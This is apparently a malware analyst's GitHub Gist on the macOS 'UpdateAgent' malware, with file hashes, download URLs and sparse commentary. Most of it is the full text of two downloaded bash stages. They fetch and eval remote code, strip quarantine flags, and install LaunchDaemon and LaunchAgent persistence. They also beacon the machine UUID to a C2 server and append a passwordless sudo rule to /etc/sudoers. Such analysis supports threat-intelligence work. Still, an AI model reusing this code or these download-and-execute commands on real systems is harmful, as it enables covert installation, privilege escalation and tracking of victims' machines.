Created
June 2, 2022 19:17
-
-
Save sysopfb/19abb48672e940e778ec591c5028230c to your computer and use it in GitHub Desktop.
UpdateAgent - GolangVersion
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
2aaebf0282463c60aa8866e733799eee97f41af1e3ac8ae7855279595217aa2f | |
SnapITool.zip | |
``` | |
https://vzhqu.snapitool.com/SnapITool.zip | |
``` | |
``` | |
/bin/sh -c ioreg -ad2 -c IOPlatformExpertDevice | xmllint --xpath '//key[.='IOPlatformUUID']/following-sibling::*[1]/text()' - | |
/bin/sh -c LSPJUJGMLBTMAMMPBETB=$(curl --connect-timeout 900 -L 'https://xrcpsvz.snapitool.com/alkzsba?machine_id=11111111-2222-3333-4444-555555555555&pr=snapitool') eval '$LSPJUJGMLBTMAMMPBETB' | |
``` | |
Downloaded code: | |
``` | |
#!/bin/bash | |
eventsNameStep1="system_intermediate_agent_step_1" | |
eventsNameStep1Fail="system_intermediate_agent_step_1_fail" | |
eventsNameStep2="system_intermediate_agent_step_2" | |
eventsNameStep2Fail="system_intermediate_agent_step_2_fail" | |
eventsNameStep3="system_intermediate_agent_step_3" | |
eventsNameStep3Fail="system_intermediate_agent_step_3_fail" | |
eventsNameStep4="system_intermediate_agent_step_4" | |
eventsNameStep4Fail="system_intermediate_agent_step_4_fail" | |
eventsNameStep5="system_intermediate_agent_step_5" | |
eventsNameStep5Fail="system_intermediate_agent_step_5_fail" | |
eventsNameStep6="system_intermediate_agent_step_6" | |
eventsNameStep6Fail="system_intermediate_agent_step_6_fail" | |
eventsNameStep7="system_intermediate_agent_step_7" | |
eventsNameStep7Fail="system_intermediate_agent_step_7_fail" | |
eventsURL="https://d2u7maudpwyo3n.cloudfront.net/pkg" | |
productName="com.buffer.system" | |
productFolder="System" | |
productTempFolder="jugcoojzoapcetvbktvt" | |
tempFolder="/tmp/$productTempFolder" | |
SOFTWAREUPDATEAGENT="SystemBuffer" | |
MACPLATFORM=`sw_vers -productName` | |
MACVERSION=`sw_vers -productVersion` | |
machineID="$(ioreg -ad2 -c IOPlatformExpertDevice | xmllint --xpath '//key[.="IOPlatformUUID"]/following-sibling::*[1]/text()' -)" | |
userDirectory=$(eval echo ~$(echo $USER)) | |
plistLA="/Library/LaunchDaemons/$productName.plist" | |
libraryDir="/Library/Application Support/$productFolder" | |
mkdir -p "$libraryDir" | |
curl --retry 5 -f "https://shhxpxrfcuocurentw.s3.amazonaws.com/$SOFTWAREUPDATEAGENT.zip" -o "$libraryDir/$SOFTWAREUPDATEAGENT.zip" | |
if [ $? -eq 0 ]; then | |
CONTESTEP1="{\"event\": \"$eventsNameStep1\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQSTEP1="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP1' $eventsURL" | |
eval $REQSTEP1 | |
if [ ! 0 -eq $? ]; then | |
echo "Failed" | |
fi | |
else | |
CONTESTEP1FAIL="{\"event\": \"$eventsNameStep1Fail\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQSTEP1FAIL="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP1FAIL' $eventsURL" | |
eval $REQSTEP1FAIL | |
if [ ! 0 -eq $? ]; then | |
echo "Failed" | |
fi | |
fi | |
xattr -r -d com.apple.quarantine "$libraryDir/$SOFTWAREUPDATEAGENT.zip" | |
chmod -R 777 "$libraryDir/$SOFTWAREUPDATEAGENT.zip" | |
ditto -x -k "$libraryDir/$SOFTWAREUPDATEAGENT.zip" "$libraryDir" | |
xattr -r -d com.apple.quarantine "$libraryDir/$SOFTWAREUPDATEAGENT" | |
chmod -R 777 "$libraryDir/$SOFTWAREUPDATEAGENT" | |
mkdir -p "$tempFolder" | |
touch "$tempFolder/$productName.plist" | |
if [ $? -eq 0 ]; then | |
CONTESTEP2="{\"event\": \"$eventsNameStep2\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQSTEP2="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP2' $eventsURL" | |
eval $REQSTEP2 | |
if [ ! 0 -eq $? ]; then | |
echo "Failed" | |
fi | |
else | |
CONTESTEP2FAIL="{\"event\": \"$eventsNameStep2Fail\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQSTEP2FAIL="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP2FAIL' $eventsURL" | |
eval $REQSTEP2FAIL | |
if [ ! 0 -eq $? ]; then | |
echo "Failed" | |
fi | |
fi | |
echo "<?xml version=\"1.0\" encoding=\"UTF-8\"?> | |
<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\"> | |
<plist version=\"1.0\"> | |
<dict> | |
<key>Label</key> | |
<string>$productName</string> | |
<key>Program</key> | |
<string>$libraryDir/$SOFTWAREUPDATEAGENT</string> | |
<key>RunAtLoad</key> | |
<true /> | |
<key>StartInterval</key> | |
<integer>3600</integer> | |
</dict> | |
</plist> | |
" > "$tempFolder/$productName.plist" | |
if [ $? -eq 0 ]; then | |
CONTESTEP3="{\"event\": \"$eventsNameStep3\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQSTEP3="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP3' $eventsURL" | |
eval $REQSTEP3 | |
if [ ! 0 -eq $? ]; then | |
echo "Failed" | |
fi | |
else | |
CONTESTEP3FAIL="{\"event\": \"$eventsNameStep3Fail\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQSTEP3FAIL="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP3FAIL' $eventsURL" | |
eval $REQSTEP3FAIL | |
if [ ! 0 -eq $? ]; then | |
echo "Failed" | |
fi | |
fi | |
chmod -R 777 "$tempFolder/$productName.plist" | |
if [ $? -eq 0 ]; then | |
CONTESTEP4="{\"event\": \"$eventsNameStep4\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQSTEP4="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP4' $eventsURL" | |
eval $REQSTEP4 | |
if [ ! 0 -eq $? ]; then | |
echo "Failed" | |
fi | |
else | |
CONTESTEP4FAIL="{\"event\": \"$eventsNameStep4Fail\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQSTEP4FAIL="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP4FAIL' $eventsURL" | |
eval $REQSTEP4FAIL | |
if [ ! 0 -eq $? ]; then | |
echo "Failed" | |
fi | |
fi | |
cp -f "$tempFolder/$productName.plist" "$plistLA" | |
if [ $? -eq 0 ]; then | |
CONTESTEP5="{\"event\": \"$eventsNameStep5\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQSTEP5="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP5' $eventsURL" | |
eval $REQSTEP5 | |
if [ ! 0 -eq $? ]; then | |
echo "Failed" | |
fi | |
else | |
CONTESTEP5FAIL="{\"event\": \"$eventsNameStep5Fail\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQSTEP5FAIL="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP5FAIL' $eventsURL" | |
eval $REQSTEP5FAIL | |
if [ ! 0 -eq $? ]; then | |
echo "Failed" | |
fi | |
fi | |
chmod -R 644 "$plistLA" | |
if [ $? -eq 0 ]; then | |
CONTESTEP6="{\"event\": \"$eventsNameStep6\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQSTEP6="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP6' $eventsURL" | |
eval $REQSTEP6 | |
if [ ! 0 -eq $? ]; then | |
echo "Failed" | |
fi | |
else | |
CONTESTEP6FAIL="{\"event\": \"$eventsNameStep6Fail\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQSTEP6FAIL="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP6FAIL' $eventsURL" | |
eval $REQSTEP6FAIL | |
if [ ! 0 -eq $? ]; then | |
echo "Failed" | |
fi | |
fi | |
launchctl load -w "$plistLA" | |
if [ $? -eq 0 ]; then | |
CONTESTEP7="{\"event\": \"$eventsNameStep7\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQSTEP7="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP7' $eventsURL" | |
eval $REQSTEP7 | |
if [ ! 0 -eq $? ]; then | |
echo "Failed" | |
fi | |
else | |
CONTESTEP7FAIL="{\"event\": \"$eventsNameStep7Fail\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQSTEP7FAIL="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP7FAIL' $eventsURL" | |
eval $REQSTEP7FAIL | |
if [ ! 0 -eq $? ]; then | |
echo "Failed" | |
fi | |
fi | |
rm -rf "$tempFolder" | |
rm "$libraryDir/$SOFTWAREUPDATEAGENT.zip" | |
``` | |
The agent downloaded is also a GoLang Macho binary from: | |
``` | |
shhxpxrfcuocurentw.s3.amazonaws.com/SystemBuffer.zip | |
``` | |
1b0d39cffd387f818747bb2b2d30aacb0cbd0901713b02b5e86300ce98bbe570 SystemBuffer.zip | |
6f675c247f2fb4350633f2f0c537fdc99bce92bbfaae184e2d79b68c1eeb2ad0 SystemBuffer | |
This file then connects in and downloads another bash script to execute | |
``` | |
curl --connect-timeout 900 -L "https://vrdazgynlt.comsysbuf.com/lklgxnagyx?maid={ID} | |
``` | |
URL portion is bugged with a error message similar to the jamf blog | |
``` | |
#!/bin/bash | |
EVENTSHEARTBEAT="optimizer_intermediate_agent_heartbeat" | |
EVENTSSTARTING="optimizer_intermediate_agent_started" | |
EVENTSDLWFileSuccess="optimizer_intermediate_agent_dlw_1_file_success" | |
EVENTSDLWFileError="optimizer_intermediate_agent_dlw_1_file_error" | |
EVENTSRunningFileSuccess="optimizer_intermediate_agent_running_1_success" | |
EVENTSRunningFileError="optimizer_intermediate_agent_running_1_error" | |
EVENTSUserExists="optimizer_intermediate_agent_already_exists" | |
EVENTSURL="https://events.optimizerservices.com/pkg" | |
PRODUCTFOLDER="lmeeznlggvhxsvttiwhtizyleqjdlc" | |
user=$(ls -l /dev/console | awk '/ / { print $3 }') | |
userHome=$(eval echo ~$(echo $user)) | |
MACHINEID="$(ioreg -ad2 -c IOPlatformExpertDevice | xmllint --xpath '//key[.="IOPlatformUUID"]/following-sibling::*[1]/text()' -)" | |
AG_1="$userHome/Library/.pixl" | |
AG_2="$userHome/Library/Application Support/.logg" | |
MACPLATFORM=`sw_vers -productName` | |
MACVERSION=`sw_vers -productVersion` | |
CONTHEARTBEAT="{\"event\": \"$EVENTSHEARTBEAT\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQHEARTBEAT="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTHEARTBEAT' $EVENTSURL" | |
eval $REQHEARTBEAT | |
PATHNAME="setup" | |
if [ ! -f "$AG_1" ]; then | |
if [ ! -f "$AG_2" ]; then | |
if [[ "$user" != "root" && "$user" != "_windowserver" ]]; then | |
CONTEVENTSSTARTING="{\"event\": \"$EVENTSSTARTING\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQEVENTSSTARTING="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTEVENTSSTARTING' $EVENTSURL" | |
eval $REQEVENTSSTARTING | |
userId=$(id -u $user) | |
TMPFILE=$(sudo -u $user mktemp /tmp/XXXXXXXXXXXX) | |
SERVICE_NAME="com.$PRODUCTFOLDER" | |
LAUNCH_AGENTS_PATH="$userHome/Library/LaunchAgents/" | |
PLIST_PATH="$LAUNCH_AGENTS_PATH$SERVICE_NAME.plist" | |
URL="<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> | |
<html xmlns="https://www.w3.org/1999/xhtml"> | |
<head> | |
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> | |
<title>404 - File or directory not found.</title> | |
<style type="text/css"> | |
<!-- | |
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} | |
fieldset{padding:0 15px 10px 15px;} | |
h1{font-size:2.4em;margin:0;color:#FFF;} | |
h2{font-size:1.7em;margin:0;color:#CC0000;} | |
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} | |
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; | |
background-color:#555555;} | |
#content{margin:0 0 0 2%;position:relative;} | |
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} | |
--> | |
</style> | |
</head> | |
<body> | |
<div id="header"><h1>Server Error</h1></div> | |
<div id="content"> | |
<div class="content-container"><fieldset> | |
<h2>404 - File or directory not found.</h2> | |
<h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> | |
</fieldset></div> | |
</div> | |
</body> | |
</html> | |
" | |
SCRIPT="sudo $TMPFILE pkgsh && rm $TMPFILE && /bin/launchctl bootout gui/$userId/$SERVICE_NAME" | |
echo "$user ALL = NOPASSWD: $TMPFILE pkgsh" >> "/etc/sudoers" | |
sudo -u $user mkdir "$LAUNCH_AGENTS_PATH" | |
if [ -f "$PLIST_PATH" ]; then | |
/bin/launchctl bootout gui/$userId/$SERVICE_NAME | |
rm $PLIST_PATH | |
fi | |
sudo -u $user /usr/bin/curl -L -o "/tmp/setup.dmg" $URL | |
if [ $? -eq 0 ]; then | |
CONTEUNZIPFILESUCCESS="{\"event\": \"$EVENTSDLWFileSuccess\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQEUNZIPZIPFILESUCCESS="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTEUNZIPFILESUCCESS' $EVENTSURL" | |
eval $REQEUNZIPZIPFILESUCCESS | |
else | |
CONTEUNZIPFILEERROR="{\"event\": \"$EVENTSDLWFileError\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQEUNZIPFILEERROR="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTEUNZIPFILEERROR' $EVENTSURL" | |
eval $REQEUNZIPFILEERROR | |
fi | |
sudo -u $user /usr/bin/xattr -rc "/tmp/setup.dmg" | |
sudo -u $user /usr/bin/hdiutil attach "/tmp/setup.dmg" | |
if [ -d "/Volumes/Install" ]; then | |
PATHNAME="Install" | |
fi | |
CONTENT_VOLUME=$(ls /Volumes/$PATHNAME | awk '/.app/') | |
sudo -u $user cp -rf "/Volumes/$PATHNAME/$CONTENT_VOLUME" "/tmp" | |
sleep 2 | |
sudo -u $user chmod -R 777 "/tmp/$CONTENT_VOLUME" | |
sudo -u $user /bin/echo "/tmp/./$CONTENT_VOLUME/Contents/MacOS/$(ls /tmp/$CONTENT_VOLUME/Contents/MacOS | head -n1) -shh" >> $TMPFILE | |
sudo -u $user chmod 777 $TMPFILE | |
sudo -u $user /usr/libexec/PlistBuddy -c "Add :Label string $SERVICE_NAME" "$PLIST_PATH" | |
sudo -u $user /usr/libexec/PlistBuddy -c 'Add :ProgramArguments array' "$PLIST_PATH" | |
sudo -u $user /usr/libexec/PlistBuddy -c "Add :ProgramArguments: string /bin/bash" "$PLIST_PATH" | |
sudo -u $user /usr/libexec/PlistBuddy -c "Add :ProgramArguments: string -c" "$PLIST_PATH" | |
sudo -u $user /usr/libexec/PlistBuddy -c "Add :ProgramArguments: string $SCRIPT" "$PLIST_PATH" | |
sudo -u $user /usr/libexec/PlistBuddy -c 'Add :RunAtLoad bool true' "$PLIST_PATH" | |
/bin/launchctl bootstrap gui/$userId "$PLIST_PATH" | |
if [ $? -eq 0 ]; then | |
CONTERUNNINGFILESUCCESS="{\"event\": \"$EVENTSRunningFileSuccess\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQERUNNINGZIPFILESUCCESS="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTERUNNINGFILESUCCESS' $EVENTSURL" | |
eval $REQERUNNINGZIPFILESUCCESS | |
else | |
CONTERUNNINGFILEERROR="{\"event\": \"$EVENTSRunningFileError\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQERUNNINGFILEERROR="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTERUNNINGFILEERROR' $EVENTSURL" | |
eval $REQERUNNINGFILEERROR | |
fi | |
sleep 10 | |
sed -i '' -e '$ d' /etc/sudoers | |
rm $PLIST_PATH | |
rm "/tmp/setup.dmg" | |
hdiutil detach "$PATHNAME" | |
fi | |
else | |
CONTUSERALREADYUPDATED="{\"event\": \"$EVENTSUserExists\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQUSERALREADYUPDATED="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTUSERALREADYUPDATED' $EVENTSURL" | |
eval $REQUSERALREADYUPDATED | |
fi | |
else | |
CONTUSERALREADYUPDATED="{\"event\": \"$EVENTSUserExists\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}" | |
REQUSERALREADYUPDATED="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTUSERALREADYUPDATED' $EVENTSURL" | |
eval $REQUSERALREADYUPDATED | |
fi | |
``` | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment